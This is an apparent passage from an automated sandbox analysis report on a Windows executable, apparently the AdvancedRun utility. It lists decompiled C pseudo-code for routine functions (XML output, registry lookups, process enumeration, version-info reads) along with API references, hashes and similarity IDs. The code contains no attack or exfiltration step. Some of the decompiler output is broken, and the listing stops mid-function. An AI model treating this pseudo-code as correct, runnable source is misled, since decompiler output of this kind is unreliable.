                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                0x00407d9c
                                                                                                                0x00407d9e
                                                                                                                0x00407da5
                                                                                                                0x00407db3
                                                                                                                0x00407dba
                                                                                                                0x00407dc5
                                                                                                                0x00407dc7
                                                                                                                0x00407dd0
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dd8
                                                                                                                0x00407de1
                                                                                                                0x00407de5
                                                                                                                0x00407deb
                                                                                                                0x00407df2
                                                                                                                0x00407df3
                                                                                                                0x00407dfe
                                                                                                                0x00407e03
                                                                                                                0x00407e04
                                                                                                                0x00407e21

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                0x00403b56
                                                                                                                0x00403b5d
                                                                                                                0x00403b6f
                                                                                                                0x00403b76
                                                                                                                0x00403b82
                                                                                                                0x00403b8d
                                                                                                                0x00403b8e
                                                                                                                0x00403b99
                                                                                                                0x00403b9e
                                                                                                                0x00403b9f
                                                                                                                0x00403ba7
                                                                                                                0x00403bb9
                                                                                                                0x00403bce
                                                                                                                0x00403be5
                                                                                                                0x00403bef
                                                                                                                0x00403bf8
                                                                                                                0x00403c00

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                0x0040afd3
                                                                                                                0x0040afe2
                                                                                                                0x0040aff3
                                                                                                                0x0040b002
                                                                                                                0x0040b023
                                                                                                                0x00000000
                                                                                                                0x0040b047
                                                                                                                0x0040b02e
                                                                                                                0x0040b034
                                                                                                                0x0040b03c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                                                                0x004092f3
                                                                                                                0x004092fb
                                                                                                                0x00409303
                                                                                                                0x00409305
                                                                                                                0x00409310
                                                                                                                0x00409439
                                                                                                                0x0040943f
                                                                                                                0x00409445
                                                                                                                0x0040944e
                                                                                                                0x00409452
                                                                                                                0x00409466
                                                                                                                0x0040946e
                                                                                                                0x00409475
                                                                                                                0x004094f7
                                                                                                                0x00409488
                                                                                                                0x00409494
                                                                                                                0x004094a5
                                                                                                                0x004094a9
                                                                                                                0x004094b5
                                                                                                                0x004094c3
                                                                                                                0x004094c6
                                                                                                                0x004094d5
                                                                                                                0x004094e3
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094e3
                                                                                                                0x00000000
                                                                                                                0x004094f7
                                                                                                                0x00409452
                                                                                                                0x00409322
                                                                                                                0x0040932b
                                                                                                                0x00409333
                                                                                                                0x00409337
                                                                                                                0x00409341
                                                                                                                0x00409342
                                                                                                                0x0040934e
                                                                                                                0x0040934f
                                                                                                                0x00409358
                                                                                                                0x0040935e
                                                                                                                0x0040935e
                                                                                                                0x00409363
                                                                                                                0x0040936b
                                                                                                                0x0040936d
                                                                                                                0x00409377
                                                                                                                0x00409385
                                                                                                                0x0040938d
                                                                                                                0x0040939d
                                                                                                                0x004093a5
                                                                                                                0x004093ac
                                                                                                                0x004093b4
                                                                                                                0x004093c5
                                                                                                                0x004093c9
                                                                                                                0x004093da
                                                                                                                0x004093df
                                                                                                                0x004093e5
                                                                                                                0x004093e6
                                                                                                                0x004093ea
                                                                                                                0x004093f6
                                                                                                                0x004093fc
                                                                                                                0x00409407
                                                                                                                0x00409407
                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                0x00402ed7
                                                                                                                0x00402eee
                                                                                                                0x00402ef8
                                                                                                                0x00402f00
                                                                                                                0x00402f01
                                                                                                                0x00402f05
                                                                                                                0x00402f0a
                                                                                                                0x00402f1a
                                                                                                                0x00402f30

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                0x004079a4
                                                                                                                0x004079b8
                                                                                                                0x004079bd
                                                                                                                0x004079c2
                                                                                                                0x004079c5
                                                                                                                0x004079c5
                                                                                                                0x004079db
                                                                                                                0x004079f7
                                                                                                                0x00407a06
                                                                                                                0x00407a0c
                                                                                                                0x00407a11
                                                                                                                0x00407a13
                                                                                                                0x00407a14
                                                                                                                0x00407a17
                                                                                                                0x00407a18
                                                                                                                0x00407a1d
                                                                                                                0x00407a22
                                                                                                                0x00407a25
                                                                                                                0x00407a2a
                                                                                                                0x00407a35
                                                                                                                0x00407a3a
                                                                                                                0x00407a3b
                                                                                                                0x00407a40
                                                                                                                0x00407a52

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                0x00404683
                                                                                                                0x00404692
                                                                                                                0x00404699
                                                                                                                0x0040469b
                                                                                                                0x004046af
                                                                                                                0x004046ba
                                                                                                                0x004046bc
                                                                                                                0x004046c7
                                                                                                                0x004046cc
                                                                                                                0x004046cd
                                                                                                                0x004046ee
                                                                                                                0x004046f3
                                                                                                                0x004046fa
                                                                                                                0x004046fa
                                                                                                                0x004046ee
                                                                                                                0x00404705

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                0x00409d5f
                                                                                                                0x00409d67
                                                                                                                0x00409d70
                                                                                                                0x00409ddb
